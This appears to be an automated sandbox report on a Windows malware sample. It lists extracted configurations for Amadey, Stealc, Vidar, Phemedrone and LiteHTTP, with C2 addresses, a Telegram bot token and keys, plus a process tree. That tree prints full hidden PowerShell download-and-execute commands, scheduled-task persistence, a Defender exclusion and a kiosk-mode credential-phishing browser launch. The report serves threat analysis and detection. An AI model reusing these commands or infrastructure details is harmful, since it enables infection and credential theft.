Analysis

  • max time kernel
    146s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/03/2025, 17:14

General

  • Target

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe

  • Size

    938KB

  • MD5

    49b60f16af6a6028755c86cad74bb4ee

  • SHA1

    a94d538bebbbcf138c9116f5201009ae14d9c773

  • SHA256

    c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67

  • SHA512

    dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

phemedrone

C2

https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument

Extracted

Family

litehttp

Version

v1.0.9

C2

http://185.208.156.162/page.php

Attributes
  • key

    v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 11 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • LiteHTTP

    LiteHTTP is an open-source bot written in C#.

  • Litehttp family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Phemedrone

    An information and wallet stealer written in C#.

  • Phemedrone family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file 21 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 30 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 35 IoCs
  • Identifies Wine through registry keys 2 TTPs 15 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 47 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 52 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 10 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 20 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 36 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
    "C:\Users\Admin\AppData\Local\Temp\c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2900
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn lTPctmafULB /tr "mshta C:\Users\Admin\AppData\Local\Temp\K6WkcacVe.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5044
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn lTPctmafULB /tr "mshta C:\Users\Admin\AppData\Local\Temp\K6WkcacVe.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2092
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\K6WkcacVe.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3140
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'ONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:592
        • C:\Users\Admin\AppData\Local\TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE
          "C:\Users\Admin\AppData\Local\TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3868
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2112
            • C:\Users\Admin\AppData\Local\Temp\10104610101\dd5195d9cc.exe
              "C:\Users\Admin\AppData\Local\Temp\10104610101\dd5195d9cc.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              • Suspicious use of WriteProcessMemory
              PID:2760
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c schtasks /create /tn Z8dPPmadele /tr "mshta C:\Users\Admin\AppData\Local\Temp\QuQG3gdKp.hta" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2764
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn Z8dPPmadele /tr "mshta C:\Users\Admin\AppData\Local\Temp\QuQG3gdKp.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:836
              • C:\Windows\SysWOW64\mshta.exe
                mshta C:\Users\Admin\AppData\Local\Temp\QuQG3gdKp.hta
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2572
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'UOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:1968
                  • C:\Users\Admin\AppData\Local\TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE
                    "C:\Users\Admin\AppData\Local\TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4460
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10104620121\am_no.cmd" "
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5016
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 2
                7⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3824
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4640
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3248
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4940
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:8
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:452
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:624
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /tn "5zEtPma5iIE" /tr "mshta \"C:\Temp\JYcRlAUhs.hta\"" /sc minute /mo 25 /ru "Admin" /f
                7⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:3436
              • C:\Windows\SysWOW64\mshta.exe
                mshta "C:\Temp\JYcRlAUhs.hta"
                7⤵
                • Checks computer location settings
                • System Location Discovery: System Language Discovery
                PID:3996
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Downloads MZ/PE file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2864
                  • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                    "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2448
            • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
              "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:3176
              • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
                "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
                7⤵
                • Executes dropped EXE
                PID:1852
              • C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe
                "C:\Users\Admin\AppData\Local\Temp\10104830101\pDZWk1j.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:3552
                • C:\Users\Admin\AppData\Roaming\5yWptUDTos.exe
                  "C:\Users\Admin\AppData\Roaming\5yWptUDTos.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:3248
                • C:\Users\Admin\AppData\Roaming\Wlm2fCOKWi.exe
                  "C:\Users\Admin\AppData\Roaming\Wlm2fCOKWi.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4268
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 3176 -s 816
                7⤵
                • Program crash
                PID:456
            • C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe
              "C:\Users\Admin\AppData\Local\Temp\10104850101\fd91aeb028.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:8
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:5060
            • C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe
              "C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2008
              • C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe
                "C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"
                7⤵
                • Executes dropped EXE
                PID:1840
              • C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe
                "C:\Users\Admin\AppData\Local\Temp\10104860101\285da3311c.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:3184
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 820
                7⤵
                • Program crash
                PID:668
            • C:\Users\Admin\AppData\Local\Temp\10104870101\50961a4f5f.exe
              "C:\Users\Admin\AppData\Local\Temp\10104870101\50961a4f5f.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1972
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                7⤵
                • Downloads MZ/PE file
                • System Location Discovery: System Language Discovery
                PID:3348
            • C:\Users\Admin\AppData\Local\Temp\10104880101\81eb0d0c11.exe
              "C:\Users\Admin\AppData\Local\Temp\10104880101\81eb0d0c11.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4052
            • C:\Users\Admin\AppData\Local\Temp\10104890101\6d19d80c13.exe
              "C:\Users\Admin\AppData\Local\Temp\10104890101\6d19d80c13.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2016
            • C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe
              "C:\Users\Admin\AppData\Local\Temp\10104900101\ce4pMzk.exe"
              6⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3228
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\cejMam5S\Anubis.exe""
                7⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious use of AdjustPrivilegeToken
                PID:876
            • C:\Users\Admin\AppData\Local\Temp\10104920101\191911f265.exe
              "C:\Users\Admin\AppData\Local\Temp\10104920101\191911f265.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:680
              • C:\Users\Admin\AppData\Local\Temp\730UXSVALTDSRR61MUM.exe
                "C:\Users\Admin\AppData\Local\Temp\730UXSVALTDSRR61MUM.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:4400
            • C:\Users\Admin\AppData\Local\Temp\10104930101\ab73b377eb.exe
              "C:\Users\Admin\AppData\Local\Temp\10104930101\ab73b377eb.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4600
            • C:\Users\Admin\AppData\Local\Temp\10104940101\637ecdac09.exe
              "C:\Users\Admin\AppData\Local\Temp\10104940101\637ecdac09.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:4088
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4040
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4256
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4972
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2372
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3348
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:3860
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:2240
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2028 -parentBuildID 20240401114208 -prefsHandle 1944 -prefMapHandle 1936 -prefsLen 27368 -prefMapSize 244628 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5a2f44b1-97af-4c84-9b55-3e346717dfda} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" gpu
                      9⤵
                        PID:1720
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2436 -prefsLen 28288 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {87934c73-8f23-417c-b02d-81d5cbaf99b0} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" socket
                        9⤵
                          PID:2452
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3036 -childID 1 -isForBrowser -prefsHandle 3028 -prefMapHandle 1612 -prefsLen 22684 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eeb58d7e-3837-4350-8842-1a006b109e26} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab
                          9⤵
                            PID:384
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4008 -childID 2 -isForBrowser -prefsHandle 4000 -prefMapHandle 3996 -prefsLen 32778 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {24a8a661-73c1-4375-826c-21540e9922e5} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab
                            9⤵
                              PID:1616
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4160 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4884 -prefMapHandle 4880 -prefsLen 32852 -prefMapSize 244628 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ee5fd668-3e3b-49b2-998d-03faed3feed9} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" utility
                              9⤵
                              • Checks processor information in registry
                              PID:5776
                            • C:\Program Files\Mozilla Firefox\firefox.exe
                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5184 -childID 3 -isForBrowser -prefsHandle 5180 -prefMapHandle 3888 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ab48211b-b21e-47ef-a52f-d1f21fe2cab8} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab
                              9⤵
                                PID:6072
                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5320 -childID 4 -isForBrowser -prefsHandle 5400 -prefMapHandle 5328 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6686719c-3390-450b-8954-b7b22e9eb713} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab
                                9⤵
                                  PID:6084
                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5608 -childID 5 -isForBrowser -prefsHandle 5528 -prefMapHandle 5536 -prefsLen 27083 -prefMapSize 244628 -jsInitHandle 1296 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e0b2a38-7c60-4800-a55d-1fc1952b48f8} 2240 "\\.\pipe\gecko-crash-server-pipe.2240" tab
                                  9⤵
                                    PID:6096
                            • C:\Users\Admin\AppData\Local\Temp\10104950101\a59235b83d.exe
                              "C:\Users\Admin\AppData\Local\Temp\10104950101\a59235b83d.exe"
                              6⤵
                              • Modifies Windows Defender DisableAntiSpyware settings
                              • Modifies Windows Defender Real-time Protection settings
                              • Modifies Windows Defender TamperProtection settings
                              • Modifies Windows Defender notification settings
                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                              • Checks BIOS information in registry
                              • Executes dropped EXE
                              • Identifies Wine through registry keys
                              • Windows security modification
                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                              • System Location Discovery: System Language Discovery
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5356
                            • C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe
                              "C:\Users\Admin\AppData\Local\Temp\10104960101\joblam.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:5972
                            • C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe
                              "C:\Users\Admin\AppData\Local\Temp\10104970101\pDZWk1j.exe"
                              6⤵
